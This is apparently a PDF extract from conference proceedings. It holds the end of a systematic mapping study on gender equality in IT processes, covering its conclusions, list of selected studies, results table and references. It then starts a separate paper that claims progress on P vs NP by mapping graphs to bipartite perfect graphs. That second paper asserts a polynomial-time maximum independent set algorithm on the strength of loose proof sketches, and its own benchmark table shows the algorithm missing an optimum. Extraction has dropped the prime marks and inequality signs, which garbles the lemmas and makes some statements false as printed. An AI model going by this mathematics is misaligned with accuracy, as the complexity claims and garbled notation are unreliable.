penalty, where, after having children, women are often seen as less committed, receive less opportunities, and are paid less [S06]. These examples together with the rest of the challenges found shows that, even though they are different challenges, each one has a certain connection with the others and, therefore, it is vital to address them together to really meet their particular objectives. For example, it is not possible to try to end the pay gap if the bias that leads to the idea that the work of a woman is not up to the work of a man is not addressed; and, in the same way, the pay gap leads women to feel less valued and capable of doing a job, materializing in other challenges such as imposter syndrome or stereotype threat. Lack of a Common Framework of Best Practices. The lack of answers to the RQ4 and, therefore, of sets of best practices on gender equality with emphasis on IT processes generates a series of findings and opportunities. Some of the studies address general best practices to better gender equality in IT, but in an isolated manner and none of them discuss this in relation to IT processes. Thus, the most prominent result is that there seems to have been no research on using IT processes as such to achieve gender equality (but there are best practices in this regard that can be used and put together), as far as the studies found through this SMS. In further detail the studies show no way to assess or ensure that the artifact from an IT process results in a product that fits the needs of all genders, or that the process itself has any focus on gender equality. For example, the best practices identified could serve as a foundation for the development of a framework or guidelines that help implement gender-friendly IT processes. Likewise, the studies that have an answer for the RQ4 are also the only studies that correspond to the Target 5.c, which is about enforcing policies for gender equality and empowerment [1]. This suggests that a research or development for promoting gender equality in IT processes has potential to further promote the Target 5.c. However, we must not forget the other Targets of the SDG 5 and these results also demonstrate the opportunity for innovation and the need to develop new research to address these important Targets in and by IT processes.
5.2 Limitations During the planning and execution of an SMS there are always limitations that can affect the results and findings. To mitigate them, it was decided to conduct 10 searches (1 at general level and 9 in relation to each of the Targets of the SDG 5 [1]). This has helped us to find studies with very specific terminology related to each of the Targets. However, it was also decided to limit the search to a short period of publication (the last 6 years). Although it is true that the purpose is to perform a first approach on the most recent and updated works and that the area of gender equality is relatively young with the most relevant studies published in recent years, this period could be longer. Finally, certain studies may have been overlooked for different reasons or certain evidence or advances on the studies found may not have been published at the time of the execution of this SMS. Likewise, the analysis of the results and findings performed in this SMS comes from the perspectives and experiences of the authors, which could not be interpreted in the same way by other stakeholders in this area. That is why, with
Gender Equality in Information Technology Processes
323
the aim to mitigate these risks, an attempt has been made to reduce the bias by analyzing the data and results obtained independently by the authors and reaching a consensus. 5.3 Implications This SMS is highly relevant both for researchers and professionals in the fields in which it is framed. The results obtained demonstrate the lack of research and developments that address gender equality in and by IT processes, as well as the importance of conducting proposals in this regard. That is why this SMS, in addition to identifying the current state of the art, also highlights the gaps and possible future lines of research/work that can be performed. The findings obtained can be used by both researchers and professionals who are working in areas such as IT management, gender equality, and social sustainability, among others. Therefore, this SMS is a relevant starting point and a demonstration of the importance of the fields it affects, which will attract new researchers and professionals in the search for gender equality in and by IT processes.
6 Conclusions and Future Work Technology has changed the world as we know it in practically all areas that surround us [3]. However, these changes, far from being perfect, are not always accompanied by positive aspects, as is the case of the gender inequality in IT [4]. That is why this study has focused its goal on analyzing the state of the art on gender equality and IT processes through an SMS. IT processes are the foundations on which all aspects related to IT in organizations are governed and managed [15]. For this reason, it is necessary for them to be sustainable and, in this case, to project exemplary gender equality, diversity, and inclusion towards the entire IT context. Through the results obtained, the novelty of this study has been evidenced, since, of the 4,206 studies found, only 15 studies are related to the established scope. Likewise, the findings achieved identify a series of opportunities and challenges on which it is necessary and urgent to act due to the importance that these fields have together. Therefore, following these findings, as future work we are working on an empirically validated proposal through the development and implementation of an IT process framework that considers all the Targets of the SDG 5 [1] and addresses the challenges identified through a set of egalitarian and inclusive best practices. In this way, we intend to help organizations establish socially sustainable foundations, as well as promote research and practice in these fields. In addition, we also intend to conduct a more indepth evaluation of the results obtained in this study through interviews or surveys with relevant professionals and researchers in the areas of gender equality and IT processes. It is our duty to ensure that the changes in our present positively affect our future and that this future is balanced, diverse, and inclusive for all. Acknowledgments. This work is result of a postdoc from the ERCIM “Alain Bensoussan” Fellowship Program conducted at the Norwegian University of Science and Technology (NTNU).
324
J. D. Patón-Romero et al.
This research is also part of the COST Action - European Network for Gender Balance in Informatics project (CA19122), funded by the Horizon 2020 Framework Program of the European Union.
Appendix A. Selected Studies S01. Nelson, L. K., Zippel, K.: From Theory to Practice and Back: How the Concept of Implicit Bias Was Implemented in Academe, and What This Means for Gender Theories of Organizational Change. Gender & Society 35(3), 330–357 (2021). S02. Albusays, K., Bjorn, P., Dabbish, L., Ford, D., Murphy-Hill, E., Serebrenik, A., Storey, M. A.: The Diversity Crisis in Software Development. IEEE Software 38(2), 19–25 (2021). S03. Biga-Diambeidou, M., Bruna, M. G., Dang, R., Houanti, L. H.: Does gender diversity among new venture team matter for R&D intensity in technology-based new ventures? Evidence from a field experiment. Small Business Economics 56(3), 1205– 1220 (2021). S04. Schmitt, F., Sundermeier, J., Bohn, N., Morassi Sasso, A.: Spotlight on Women in Tech: Fostering an Inclusive Workforce when Exploring and Exploiting Digital Innovation Potentials. In: 2020 International Conference on Information Systems (ICIS 2020), pp. 1–17. AIS, India (2020). S05. Atal, N., Berenguer, G., Borwankar, S.: Gender diversity issues in the IT industry: How can your sourcing group help?. Business Horizons 62(5), 595–602 (2019). S06. Charlesworth, T. E., Banaji, M. R.: Gender in Science, Technology, Engineering, and Mathematics: Issues, Causes, Solutions. Journal of Neuroscience 39(37), 7228–7243 (2019). S07. González-González, C. S., García-Holgado, A., Martínez-Estévez, M. A., Gil, M., Martín-Fernandez, A., Marcos, A., Aranda, C., Gershon, T. S.: Gender and Engineering: Developing Actions to Encourage Women in Tech. In: 2018 IEEE Global Engineering Education Conference (EDUCON 2018), pp. 2082–2087. IEEE, Spain (2018). S08. Diekman, A. B., Steinberg, M., Brown, E. R., Belanger, A. L., Clark, E. K.: A Goal Congruity Model of Role Entry, Engagement, and Exit: Understanding Communal Goal Processes in STEM Gender Gaps. Personality and Social Psychology Review 21(2), 142–175 (2017). S09. Gorbacheva, E., Stein, A., Schmiedel, T., Müller, O.: The Role of Gender in Business Process Management Competence Supply. Business & Information Systems Engineering 58(3), 213–231 (2016). S10. Stewart-Williams, S., Halsey, L. G.: Men, women and STEM: Why the differences and what should be done?. European Journal of Personality 35(1), 3–39 (2021). S11. Harvey, V., Tremblay, D. G.: Women in the IT Sector: Queen Bee and Gender Judo Strategies. Employee Responsibilities and Rights Journal 32(4), 197–214 (2020). S12. Segovia-Pérez, M., Castro Núñez, R. B., Santero Sánchez, R., Laguna Sánchez, P.: Being a woman in an ICT job: An analysis of the gender pay gap and discrimination in Spain. New Technology, Work and Employment 35(1), 20–39 (2020).
Gender Equality in Information Technology Processes
325
S13. Di Tullio, I.: Gender Equality in STEM: Exploring Self-Efficacy Through Gender Awareness. Italian Journal of Sociology of Education 11(3), 226–245 (2019). S14. LaCosse, J., Sekaquaptewa, D., Bennett, J.: STEM Stereotypic Attribution Bias Among Women in an Unwelcoming Science Setting. Psychology of Women Quarterly 40(3), 378–397 (2016). S15. Shishkova, E., Kwiecien, N. W., Hebert, A. S., Westphall, M. S., Prenni, J. E., Coon, J. J.: Gender Diversity in a STEM Subfield – Analysis of a Large Scientific Society and Its Annual Conferences. Journal of The American Society for Mass Spectrometry 28(12), 2523–2531 (2017).
Appendix B. Results Mapping Table 5 includes a mapping of the answers of the different selected primary studies with respect to the defined research questions (RQs). Table 5. Data Extraction Results from the Primary Studies ID
Type (RQ1)
Targets (RQ2) Challenges (RQ3)
Best Practices (RQ4)
S01 Others
• Target 5.1 • Target 5.5
• Implicit bias
S02 Others
• Target 5.1 • Target 5.5
• • • •
S03 Others
• Target 5.5
• Gender bias
S04 Validation
• • • •
Target 5.1 Target 5.4 Target 5.5 Target 5.c
• • • • •
Few women Gender bias Retention problems Imposter syndrome Motherhood penalty
• Women workshops
S05 Proposal
• • • •
Target 5.1 Target 5.4 Target 5.5 Target 5.c
• • • •
Recruitment Poor management Retention problems Gender bias
• Nudging
S06 State of the art • • • •
Target 5.1 Target 5.4 Target 5.5 Target 5.c
• Gender bias • Gender preferences • Pay gap
S07 State of the art • Target 5.5
• • • •
Gender bias Code acceptance Disengagement Imposter syndrome
• Habit-breaking
Gender bias Pay gap Retention problems Implicit bias (continued)
326
J. D. Patón-Romero et al. Table 5. (continued)
ID
Type (RQ1)
Targets (RQ2) Challenges (RQ3)
Best Practices (RQ4)
S08 Validation
• Target 5.5 • Target 5.b • Target 5.c
• Gender bias • Imposter syndrome • Stereotype threat
• Goal congruity model
S09 Validation
• Target 5.5
• Imposter syndrome
S10 State of the art • Target 5.4 • Target 5.5 • Target 5.c
• Gender preferences • Stereotype threat
S11 Others
• • • •
• Target 5.1 • Target 5.5
Symbolic violence Queen bee syndrome Motherhood penalty Imposter syndrome
S12 State of the art • Target 5.1 • Target 5.5
• Pay gap • Gender-based discrimination • Motherhood penalty • Imposter syndrome
S13 Validation
• Target 5.1 • Target 5.4 • Target 5.5
• Implicit Bias • Self-efficacy • Imposter syndrome
S14 Others
• Target 5.1 • Target 5.5
• • • •
S15 State of the art • Target 5.1 • Target 5.5
• Anti-bias training • Gender blind training
Gender bias Stereotype bias Negative environment Stereotype threat
• Implicit bias
References 1. United Nations: Transforming Our World: The 2030 Agenda for Sustainable Development. In: Seventieth Session of the United Nations General Assembly, Resolution A/RES/70/1. United Nations (UN), USA (2015) 2. Purvis, B., Mao, Y., Robinson, D.: Three pillars of sustainability: in search of conceptual origins. Sustain. Sci. 14(3), 681–695 (2019) 3. Schwab, K.: The Fourth Industrial Revolution. The Crown Publishing Group, USA (2017) 4. Albusays, K., et al.: The diversity crisis in software development. IEEE Softw. 38(2), 19–25 (2021) 5. DuBow, W., Pruitt, A.S.: NCWIT scorecard: the status of women in technology. National Center for Women & Information Technology (NCWIT), USA (2018) 6. Stoet, G., Geary, D.C.: The gender-equality paradox in science, technology, engineering, and mathematics education. Psychol. Sci. 29(4), 581–593 (2018) 7. Glass, J.L., Sassler, S., Levitte, Y., Michelmore, K.M.: What’s so special about STEM? A comparison of women’s retention in STEM and professional occupations. Soc. Forces 92(2), 723–756 (2013)
Gender Equality in Information Technology Processes
327
8. Keohane, N.O.: Women, power & leadership. Daedalus 149(1), 236–250 (2020) 9. Ahinkorah, B.O., et al..: Association between female genital mutilation and girl-child marriage in sub-Saharan Africa. J. Biosoc. Sci. 55(1), 1–12 (2022) 10. Avalos, L., Farrell, N., Stellato, R., Werner, M.: Ending female genital mutilation & child marriage in Tanzania. Fordham Int. Law J. 38(3), 639–700 (2015) 11. Diekman, A.B., Steinberg, M., Brown, E.R., Belanger, A.L., Clark, E.K.: A goal congruity model of role entry, engagement, and exit: understanding communal goal processes in STEM gender gaps. Pers. Soc. Psychol. Rev. 21(2), 142–175 (2017) 12. González Ramos, A.M., Vergés Bosch, N., Martínez García, J.S.: Women in the technology labour market. Revista Española de Investigaciones Sociológicas (REIS) 159, 73–89 (2017) 13. González-González, C.S., et al.: Gender and engineering: developing actions to encourage women in tech. In: 2018 IEEE Global Engineering Education Conference (EDUCON 2018), pp. 2082–2087. IEEE, Spain (2018) 14. de Melo Bezerra, J., et al.: Fostering stem education considering female participation gap. In: 15th International Conference on Cognition and Exploratory Learning in Digital Age (CELDA 2018), pp. 313–316. IADIS, Hungary (2018) 15. ISACA: COBIT 2019 Framework: Governance and Management Objectives. Information Systems Audit and Control Association (ISACA), USA (2018) 16. Kitchenham, B.: Guidelines for Performing Systematic Literature Reviews in Software Engineering (Version 2.3). Keele University, UK (2007) 17. Brereton, P., Kitchenham, B.A., Budgen, D., Turner, M., Khalil, M.: Lessons from applying the systematic literature review process within the software engineering domain. J. Syst. Softw. 80(4), 571–583 (2007) 18. Petersen, K., Feldt, R., Mujtaba, S., Mattsson, M.: Systematic mapping studies in software engineering. In: 12th International Conference on Evaluation and Assessment in Software Engineering (EASE 2008), pp. 68–77. ACM, Italy (2008) 19. American Psychological Association: APA Dictionary of Psychology (Second Edition). American Psychological Association, USA (2015) 20. Borokhovski, E., Pickup, D., El Saadi, L., Rabah, J., Tamim, R.M.: Gender and ICT: metaanalysis and systematic review. Commonwealth of Learning, Canada (2018) 21. Yeganehfar, M., Zarei, A., Isfandyari-Mogghadam, A.R., Famil-Rouhani, A.: Justice in technology policy: a systematic review of gender divide literature and the marginal contribution of women on ICT. J. Inf. Commun. Ethics Soc. 16(2), 123–137 (2018) 22. Fox, M.P., Lash, T.L., Bodnar, L.M.: Common misconceptions about validation studies. Int. J. Epidemiol. 49(4), 1392–1396 (2020)
The P vs. NP Problem and Attempts to Settle It via Perfect Graphs State-of-the-Art Approach Maher Heal1(B) , Kia Dashtipour2 , and Mandar Gogate2 1
2
Baghdad University, Jadirayh, Iraq [email protected] School of Computing, Edinburgh Napier University, Merchiston Capus, Edinburgh, UK
Abstract. The P vs. NP problem is a major problem in computer science. It is perhaps the most celebrated outstanding problem in that domain. Its solution would have a tremendous impact on different fields such as mathematics, cryptography, algorithm research, artificial intelligence, game theory, multimedia processing, philosophy, economics and many other fields. It is still open since almost 50 years with attempts concentrated mainly in computational theory. However, as the problem is tightly coupled with npcomplete class of problems theory, we think the best technique to tackle the problem is to find a polynomial time algorithm to solve one of the many npcompletes problems. For that end this work represents attempts of solving the maximum independent set problem of any graph, which is a well known np-complete problem, in a polynomial time. The basic idea is to transform any graph into a perfect graph while the independence number or the maximum independent set of the graph is twice in size the maximum independent set or the 2nd largest maximal independent set of the transformed bipartite perfect graph. There are polynomial time algorithms for finding the independence number or the maximum independent set of perfect graphs. However, the difficulty is in finding the 2nd largest maximal independent set of the bipartite perfect transformed graph. Moreover, we characterise the transformed bipartite perfect graph and suggest algorithms to find the maximum independent set for special graphs. We think finding the 2nd largest maximal independent set of bipartite perfect graphs is feasible in polynomial time. Keywords: P vs. NP · Computational complexity Independence number · Perfect graphs
1
· Np-Complete ·
Introduction
The P vs NP problem is the most outstanding problem in computer science. Informally defined it asks if there are algorithms that are fast (P from polynomial) to solve problems that only slow algorithms are known to solve them (NP from non-deterministic polynomial). For stating it more explicitly, we need to define the two problems classes P and NP. P class is the set of the problems c The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 328–340, 2023. https://doi.org/10.1007/978-3-031-28073-3_23
The P vs. NP Problem
329
that there are algorithms that run in polynomial manner as a function of the input resources time and space to solve them. On the other hand NP class is the set of problems that their solution is verifiable in polynomial time but can be found in non polynomial time as a function of the input resources time and space. As one example consider positive integers factorisation to primes, while any set of primes as a factorisation of a certain integer is easily verified if they are indeed the primes factors of the integer, there is no easy way (polynomial) to factor the integer into its prime factors especially when the integer is very large. Another example is the maze with start and destination points. While it is easy to check if a path leads to the destination from the start point given that path, it is not easy and maybe we need to check exponential number of paths to find a solution to the maze. Thus, the P vs. NP problem ask if there are P-algorithms to solve problems that their solution is polynomially verified, but otherwise not polynomially can be found or thought so. A formal definition assuming a Turing machine as our computer can be found in the literature, see for example [1–3]. However, we do not need that formal definition as our approach is graph theoretic and based on the concept of npcomplete which we define below. Np-complete class problems are a set of problems that any np problem can be reduced in polynomial time to the np-complete problem. Accordingly, if one succeeded in finding a P-algorithm for one of the np-complete problems that means all np problems can be solved in polynomial time. This is the approach we will follow in trying to settle the P vs NP problem. This work explore solutions to one of the np-complete problem, mainly the maximum independent set, by transforming any graph to a perfect graph while the maximum independent set is encoded in the perfect graph attributes. The attribute is either the maximum independent set of the perfect graph, where polynomial time algorithms are known to find them, or the second largest maximal independent set which we try to find a polynomial time algorithm for. This paper is organised as follows: Sect. 2 is a brief review of the literature on P vs. NP problem and perfect graphs. Section 3 covers the basic transformation of any graph to a perfect graph that we propose. Section 4 explains the possible techniques to extract the maximum independent set for the graph from its transformed perfect graph and some properties of that perfect graph. Section 5 contains results for some graphs. Finally, Sect. 6 is the conclusion and future work.
2
Literature Review
Many attempts tried to settle the P vs NP problem mainly centred around computational complexity. One of the techniques to prove P = NP is relativisation. However, Baker, Gill and Solovay [5] showed no relativizable proof can settle the P versus NP problem in either direction. Another attempt is based on Circuit Complexity. To show P = NP we just need to show some np-complete problem cannot be solved by relatively small circuits of AND, OR, and NOT gates. However, Furst, Saxe, and Sipser [8] and Razborov [6,7] showed this path
330
M. Heal et al.
does not lead to P vs. NP problem settlement. Some researchers relied on the proof complexity methods to show P = NP, but as can be seen from the work of Haken, A. [9] this path is not fruitful either. For other procedures that are mainly computational complexity procedures and trying to show P = NP one can read the interesting article in the Communication of the ACM [4]. Our approach is based on attacking one of the np-complete problems, namely the maximum independent set problem, and proving there is/is not a polynomial time algorithm to solve it. For the purpose of that we convert the graph into a perfect graph. Perfect graphs are defined as such graphs the chromatic number of any induced subgraph is equal to the clique number of that induced subgraph. An interesting property of the perfect graph that was conjuctered by Berge [10] and proved by Maria et al. [11] (see Maher Heal for simpler polyhedral proofs [12]) is characterised by the strong perfect graph theorem. That is a perfect graph is free of odd holes and odd anti-holes. There are many interesting classes of graphs that are perfect such as bipartite, interval,. . . etc. One useful property of perfect graphs is that there are polynomial time algorithms to find essential graph variants such as the independence number, clique number and chromatic number [13]. We use this property to try to find solutions for the general problem of the independence number and/or maximum independent set of any graph.
3
Transforming Any Graph into a Perfect Graph
Assume we have an undirected graph G = (V, E) where V is the set of vertices and E is the set of edges. An undirected graph is defined as a set of vertices V and a set of edges which are unordered pair of vertices Ei = (vj , vk ), Ei ∈ E, vj ∈ V and vk ∈ V . The set of all vertices that are mutually not connected by an edge is called an independent set or a stable set. If this set cannot be extended by adding more vertices to it, keeping the mutual non-connectivity of its vertices condition, it is called a maximal independent set. The maximum of all maximal independent sets is called a maximum independent set. Finding the maximum independent set or maximal independent sets of a general graph are both well-known np-complete problems. However, for perfect graphs at least the maximum independent set can be found in a polynomial time [13]. As per the strong perfect graph theorem a perfect graph is a graph that is free of odd holes and odd anti-holes [11,12]. A hole is a loop of vertices of at least 4 vertices with no chord inside. The anti-hole is the complement of the hole. Odd holes or odd anti-holes are holes or anti-holes whose number of vertices is odd respectively. See Fig. 1 for an example of odd hole and odd anti hole of 5 vertices. We transform the graph G into a perfect graph T by replacing every vertex a ∈ V by two vertices a and a . For any two vertices a, b ∈ G if a is not connected to b then their images in T , a, a , b, b are mutually not connected. On the other hand if a is connected by an edge to b then a is connected to b and a is connected to b in the graph T . By using this transformation every odd hole becomes even hole and every odd antihole becomes even antihole; see Fig. 2 and Fig. 3 for illustration of this.
The P vs. NP Problem
331
Fig. 1. (A) An odd hole of size 5 (B) The complement of the odd hole, an antihole of size 5-the dashed lines are for the odd hole.
Fig. 2. A graph G, an odd hole (left side), its transformed graph T (middle) and the bipartite graph representation of T (right side).
4
Extracting the Independence Number from the Transformed Perfect Graph
If we assume the graph G has n vertices with independence number α(G), then it is easy to see the independence number of the transformed bipartite graph T is max(n, 2.α(G)). So if 2.α(G) ≥ n, we have a polynomial time algorithm to find α(G) since α(T ) = 2.α(G) and there is a polynomial time algorithm to find α(T ) since T is perfect. Indeed if we have a polynomial time algorithm to find the two largest maximal independent sets of any perfect graph, that means P = NP. 4.1
Characterisation of the Transformed Graph T
We state here some simple lemmas to characterise the maximal independent set of T that is a map for a maximum independent set in G. Lemma 1. Starting from any vertex as a centre in graph T we can build a tree that is a representation of graph T such that Δab is constant, where Δab is the shortest distance between vertices a and b, {a, b} ⊆ T . Δab is independent of the tree centre, and is equal to the smallest number of hops (vertices) between vertices a and b on a path between them such that a and b are inclusive
332
M. Heal et al.
Fig. 3. A graph G, an odd anti-hole (left side) and its transformed graph T (right side).
Proof. This is a straightforward lemma since ω(T ) = 2. Note that Δab is the smallest number of hops (vertices) between vertices a and b on a path between them such that a and b are inclusive. As an example, please see Fig. 5. We will use concrete examples to illustrate the different concepts and lemmas in the subsequent text later on. Lemma 2. For any vertex v ∈ T the number of hops between v and v , i.e. the distance Δvv is even and at least 4, i.e. 4, 6, 8,.... Proof. Since the vertices a, b, c, ... etc. and a , b , c , ... etc. are mutually not connected respectively in T from its definition, then the possible paths from v to v could be v, r , s, v , i.e. Δvv is 4 or v, r , s, u , m, v , i.e. Δvv is 6 and so on. v, r , s, u , m, v are all vertices in T . Lemma 3. If G is connected, so is T if and only if G has an odd loop of 3 vertices or more (which is the case if ω(G) ≥ 3 or if we have an odd hole). If we have ω(G) = 2 and G may contain only even loops (holes) then T = T1 ∪ T2 such that each of the graphs T1 and T2 is connected, but T1 is not connected to T2 . Proof. If G may have only even loops, i.e. ω(G) = 2 and there are no odd holes in G, then the numbers of vertices of each loop is even, say 2n, n = 2, 3, 4, ..., then the loop is {1, 2, 3, ..., 2n, 1} and its image in T are the subgraphs {1, 2 , 3, 4 , ..., 2n−1, (2n) , 1} and {1 , 2, 3 , 4, ..., (2n−1) , 2n, 1 }, which is clearly each is connected, but both are not connected to each other. However if G contains a loop of odd number of vertices (i.e. ω(G) ≥ 3 or ω(G) = 2 and G contains an odd hole), say the loop is {1, 2, ...2n, 2n+1, 1}, n = 1, 2, 3, ... etc. then the image of that loop in T is the even loop {1, 2 , 3, 4 , ..., 2n + 1, 1 , 2, 3 , ...(2n + 1) , 1} which is clear an even connected loop. Now assume G is connected and
The P vs. NP Problem
333
there is an odd loop of 3 vertices or more in G, we will show that T for this graph is connected. Let x1 and x2 are two vertices in G and x1 , x1 and x2 , x2 are their images in T respectively, see Fig. 4. Let R be an odd loop of 3 vertices or more and a, b are two vertices of R such that there is a path from x1 to a and a path from x2 to b; such paths do exist since G is connected. It is easy to see that in T there is a path from x1 to a or a , x1 to a or a , x2 to b or b and x2 to b or b . Since the image of R in T is connected, i.e. there is a path between any two of a, a , b and b then there is a path between any two vertices of x1 , x1 , x2 and x2 in T .
R Odd loop of 3 or more vertices x2
x1 (A)
a b
c x2
x1
(B) c b a
x1
x2 2
1
(C)
Fig. 4. (A) Graph G that contains at least one odd loop R (B) An example graph of graph G (C) The transformation of graph G in B, i.e. Graph T .
Lemma 4. The following are true, assuming we have a tree representation of T starting from an arbitrary vertex v as per Lemma 1. 1. Δab = Δa b and Δab = Δa b for any two vertices a and b in T , assuming there is a path between any two of those vertices such as a, b or a, b , ... etc. 2. The vertices on any circle are mutually not connected to each other, where the vertices on each circle are those having a fixed equal distance from the center v. 3. The vertices on any circle are either all primed such as r , s , t , ... or all not primed such as r, s, t, ...
334
M. Heal et al.
4
c3 2
c1
circle 2 b11
b12
x
b13
1
circle 1
v
b33
b21
2
3
b22 b32
b31
b23
Fig. 5. An example of a tree representation of graph T starting at vertex v, Δvx = 4.
4. Vertices that belong to adjacent circles are such that all vertices on one of these circles are primed (not primed) and on the second circle not primed (primed), respectively. Proof. The proof of all the statements is straightforward as a conclusion from the definition of graph T and its symmetry. Lemma 5. Assume T is represented by a tree with centre v and circles that are 4 hops apart from each other, as the example in Fig. 5, the distance between v, circle 1 and circle 2 is 4 hops, i.e. Δvc = 4 and also note Δc c3 = 4. A set Υ that is the set formed by the union of vertex v and the vertices that are on circles that are 4 hops far from each other contains at least one of the pair of vertices members (primed or not primed) of a maximal independent set that could be a maximum independent set in T which is the map of a maximal independent set that could be a maximum independent set in G, and that maximal (maximum) independent set in T , is formed by extending Υ , by taking those vertices in Υ with their pairs, i.e. we take v, v , u, u , s, s .... and so on. The case when there are vertices not on circles that are 4 hops apart, will be discussed at the end of this lemma proof. Proof. We seek to find the maximum maximal independent set in T that has as its members pairs such as u, u , v, v , s, s ...etc., because this is the image in T of a maximum independent set in G; we call this ‘Υ extension’. Lemma 5 claims that if Υ is the set of all vertices in the tree representation of T that are 4 hops apart, starting from v and v is inclusive, then Υ contains at least one of
The P vs. NP Problem
335
each vertices pair that form a maximal (maximum) independent set in T which is an image for a maximal (maximum) independent set in G. To prove that we need to prove the following (1) Υ vertices are not connected to each other (2) we can extend Υ by adding the vertex pair of any vertex in Υ and still Υ contains mutually non-connected vertices and finally (3) Υ cannot be extended beyond that as stated in step 2; we call this extended set ‘Υ extension’. It is clear 1 is true since the vertices on any circle are either primed or not and since the distance between any vertices on different circles is more than 2. Regarding 2, see Fig. 6, where labels of vertices with numbers shows possible locations of a vertex pair. For example for A which is on circle 2 in black, the possible positions of A are A1, A2, A3, A4, A5, ... since Δuu = 4, 6, 8, ... for any vertex u. By removing the vertices on the red circles we are left with Υ set of vertices which are mutually not connected to each other. By lemma 4 the added vertices to Υ are also mutually not connected to each other since we excluded all vertices that the distance (Δ) between them is 1. However, when we have vertices not on circles, i.e. they are not multiple of 4 hops apart from v, then we need to consider them separately as they could be added; for example if we have vertices on circle 1’ in red and there are no vertices connected to them on circle 2 in black, i.e. when branches terminate in circle 1’ in red. It is easy to see such set ‘Υ extension’ cannot be extended further. To account for all maximal independent sets of pairs we need to change the center of the tree v by considering all vertices inside circle 2 in black to be centers of the tree and repeating the procedure for each one of them, otherwise ‘Υ ’ can be extended beyond ‘Υ extension’.
4.2
Algorithms to Find the Independence Number for Special Graphs
Algorithm I. By assuming the maximum independent set of graph G has a vertex only belongs to it then an algorithm to find it as follows. By noting that as we have tree representation of T , as in Fig. 7; start from some arbitrary vertex v (this is to be repeated for all vertices) and assigning v and v 1 and move from v and v to all their neighbours that are assigned 0 and keep moving (tracing the graph) and assign 1 to neighbours of v and v neighbours N (v, v ) (as example v(1) − − > p (0) − − > q(1) − − > ..., v (1) − − > p(1) − − > q (0) − − > ....). However, in any vertex assignment if that result in adjacent vertices assigned 1, then we assign that vertex 0. The algorithm is depicted in Algorithm 1. Since the maximum independent set in G has a vertex only belongs to it, we sure will end in a maximum independent set of G since we are starting from a different vertex in each run of the algorithm and we are exhausting all the vertices. Algorithm II. Another algorithm keeping the same assumption as the pervious section as follows. By starting from any vertex u we assign 1 to u and u , all vertices
336
M. Heal et al. A3
B3
x3' A2
B2
x2' A1
Circle 4
E2' E1'
B1 E
x1' Circle 3
A'
B' C'
Circle 2
A5 D'
x(D1) z A4 Circle 1 v Circle 1
Circle 2 Circle 2
Circle 3
Fig. 6. An Example of Graph T and its Tree Representation Starting from Vertex v and the Different Combinations to Find Maximum Maximal Independent Set of Pairs.
one hop away from u and u ; i.e. neighbours, N (u, u ), of u and u are assigned 0, and then taking another vertex r, different from u, u , N (u, u ) and assign 1 to it and to r ; all vertices connected to r, r , i.e. N (r, r ) are assigned 0, if that is not possible, i.e. we have a conflict by having two adjacent vertices have to be assigned 1 while they were already (or at least one is) assigned 0, then r and r are assigned 0. We repeat that until we exhaust all vertices. Then we repeat the same procedure all over again by taking a vertex different from u as the starting vertex. The procedure is repeated for all vertices as starting points. If we assume there are 2n vertices in T then we need to repeat the procedure n times as starting vertex and for every vertex we need to check at most 2n.2n pairs. Hence the worst case scenario is O(n3 ) operations. Accordingly, we have a P-algorithm to find a maximum independent set. This can be easily confirmed by noting the procedure converges to a maximal independent set and since there is one vertex belongs to a maximum independent set and we repeat it by taking as a starting point all the vertices in T one by one, we must converges to a maximum maximal independent set in T , which is the map of a maximum independent set in G.
The P vs. NP Problem
337
1: start at any vertex v ∈ T ; marker: 2: v ← 1, v ← 1 ; 3: if last step makes two adjacent vertices assigned 1 then 4: v ← 0, v ← 0; 5: end if 6: all N (v, v ) ← v¯; 7: if all vertices were visited then 8: MIS = vertices assigned 1; 9: Quit; 10: end if 11: ∀r ∈ N (N (v, v )); set v = r; 12: goto marker;
Algorithm 1: Search Algorithm to Find a Maximum Independent set by Tracing Graph T , v¯ is complement of the assigned bit to vertex v.
4.3
Example Graphs
In Fig. 8 we see a graph in (A) i.e. the T graph and its tree representation in (B). Δuu is even and at least 4, such as Δ11 = Δ22 = 6 and Δ44 = 4. Note that Δab = Δa b , and Δab = Δa b such as Δ13 = Δ1 3 = 5 and Δ15 = Δ1 5 = 4. If we take 1, 2’, 6’ then we must exclude 3, 4, 5 and so are 3’, 4’, 5’, thus the maximum maximal independent set in T is 1, 1’, 2, 2’, 6, 6’ and the maximum independent set in G is 1, 2, 6. Now when we apply algorithm 2, we start with a vertex, let it be 1 so we set vertex 1 and 1’ to 1. All their neighbours are set to 0, 4 and 4’. we pick a vertex different from 1, 1’, 4 and 4’ and set it with its pair to 1, let that vertex be 2 for example, so we set 2, 2’ to 1. Now all neighbours of 2 and 2’ are set to 0, i.e. 5 and 5’, and we have left 3, 3’, 6 and 6’. We can set any of the left vertices to 1 while the others to 0; so the maximum independent sets are {1, 2, 6} or {1, 2, 3}. Note maybe we converge to a maximal independent set and not to a maximum independent set, but by starting from a vertex that belongs to only one maximum independent set sure we will converge to that maximum independent set. Now following algorithm 1, and starting by vertex 1, 1’ we set both to 1 and we start tracing the tree so 4, 4’ are set to 0 and then all 5, 6, 5’, 6’ are set to 1. However, we have now a conflict - two adjacent vertices 5 and 6’ in addition to 5’ and 6’ are set to 1, but by taking any of 5 or 6 and setting it with its pair to 1 we don’t have that conflict. Let us say we set 5 and 5’ to 1 and hence the next vertices on the path that are set to 0 are 2’, 6’ and 2, 6 and moving from 6 to 3’ (or 6’ to 3), we set 3 and 3’ to 1. Thus the maximum independent set is {1, 5, 3}.
338
M. Heal et al.
e f g
h
a
i
j Fig. 7. Tree Representation of Graph T used in Algorithm 1. 3 1 4 2
4
5
2
3 6 1 4
5
6 A
B
Fig. 8. A Concrete Example of Graph T and its Tree Representation Starting from Vertex 1.
5
Results
We applied algorithm 1 and algorithm 2 using MacBook Pro 2019 with 2.3 GHz 8-core Intel core i9 CPU, 32 GB of memory and macOS Monterey, to some of DIMACS benchmarks to find the maximum clique [14], see Table 1. We see good results for all the graphs except one. Algorithm 2 (ω2 is the estimated clique number by the algorithm) is better than algorithm 1 (ω1 is the estimated clique
The P vs. NP Problem
339
Table 1. Some of DIMACS benchmarks for maximum clique Graph name or No ω
ω1
ω2
time
time
4
4
0.1617 × 10−3
4
0.0192
MANN-a9
16
9
0.7075 ×10−4
16
0.0263
hamming6-2
32
32
hamming6-4
4
4
johnson8-4-4
14
14
johnson16-2-4
8
8
C125.9
34
keller4
11
johnson8-2-4
0.1438 × 10−3 32
0.0440
0.9787 × 10−4
0.0623
4
0.1023 × 10−3 14
0.0656
0.3476 × 10−3
8
0.1095
26
0.4048 × 10−3 31
